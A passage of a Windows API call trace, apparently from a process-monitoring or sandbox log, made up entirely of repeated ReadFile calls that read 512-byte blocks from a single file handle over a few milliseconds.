lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.997] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.997] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.997] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.997] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.997] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.997] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.997] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.997] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.998] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.999] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.999] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.999] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.999] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.999] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.999] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.999] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.999] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.999] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.999] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.000] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.002] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.003] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.003] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.003] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.003] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.003] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.003] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.003] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.003] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.003] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.003] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.010] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.010] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.010] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.010] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.010] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.010] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.010] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.010] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.011] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.012] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.012] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.012] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.012] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, 